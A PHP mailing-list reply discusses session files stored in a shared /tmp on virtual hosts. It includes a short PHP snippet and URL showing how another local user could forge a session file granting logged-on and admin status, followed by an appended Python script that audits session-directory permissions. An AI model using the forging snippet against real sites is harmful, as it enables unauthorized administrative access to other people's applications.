> >> ... and I am -- A shared host server that is.
> >
> > Now I'm not sure on this, I haven't tested it. Has anyone?
> 
> Is this particular vulnerability only in existence when the server is pretty
> open?  I mean, on my particular host, I can't FTP to anything outside my
> docroot, and I can't use SSH, telnet, etc.

That's for you, but when you run a PHP script, you run it as user
Apache, www, nobody, etc...however your system is set up (if PHP is a
module).

> phpinfo() says my session.save-path is /tmp -- since (in theory) I can't get
> the files via telnet, FTP or HTTP, the only option I can think of would be
> another user on the host gaining access to it via a PHP script... which I'm
> not sure can be done, and can't really test, because I wouldn't know how to
> do it.

Yes, the attack could only come from someone on the same server. That's
why dedicated servers are preferred and why safe_mode is used on virtual
servers. Safe_mode may protect the sessions, too, not sure.

<?
$_SESSION['Logged_On'] = 1;
$_SESSION['Admin'] = 1;
$s = serialize($_SESSION);

$fp = fopen("/tmp/bad_session.file","w");
fwrite($fp,$s);
fclose($fp);
?>

http://www.yoursite.com?PHPSESSID=bad_session

I don't have a virtual server environment to actually test this out
with, though...and it would require a lot of work from the hacker...but
what else do they have to do. Get a dedicated server...they really
aren't that expensive anymore.

---John Holmes...



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
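
Added example, not part of the original message or of PHP itself: a Python audit of a session save directory such as the /tmp path discussed above, reporting ownership and permission problems that let other local accounts reach session files. The function name, finding labels and sample files are assumptions made for this illustration. As the reply notes, when every account's PHP runs as the same Apache user these checks cannot tell tenants apart, so a clean result only means something where PHP runs per account.

```python
import os
import stat
import tempfile


def audit_session_dir(path, expected_uid=None):
    """Return finding labels (hypothetical names) for a session save directory."""
    if expected_uid is None:
        expected_uid = os.geteuid()
    st = os.lstat(path)  # lstat: do not follow a symlinked save path
    if not stat.S_ISDIR(st.st_mode):
        return ["not-a-real-directory"]
    findings = []
    if st.st_uid != expected_uid:
        findings.append("dir-foreign-owner")
    if st.st_mode & 0o002:
        findings.append("dir-world-writable")  # any local user can create files here
    elif st.st_mode & 0o077:
        findings.append("dir-group-other-access")
    for entry in sorted(os.scandir(path), key=lambda e: e.name):
        if not entry.is_file(follow_symlinks=False):
            continue
        est = entry.stat(follow_symlinks=False)
        if est.st_uid != expected_uid:
            findings.append("file-foreign-owner:" + entry.name)
        if est.st_mode & 0o077:
            findings.append("file-group-other-access:" + entry.name)
    return findings


if __name__ == "__main__":
    # Constructed sample: a /tmp-style directory (mode 1777) holding one file.
    shared = tempfile.mkdtemp()
    os.chmod(shared, 0o1777)
    sample = os.path.join(shared, "constructed_session_file")
    with open(sample, "w") as fh:
        fh.write("constructed")
    os.chmod(sample, 0o644)
    print("shared :", audit_session_dir(shared))
    # Same directory after tightening to a private layout.
    os.chmod(shared, 0o700)
    os.chmod(sample, 0o600)
    print("private:", audit_session_dir(shared))
```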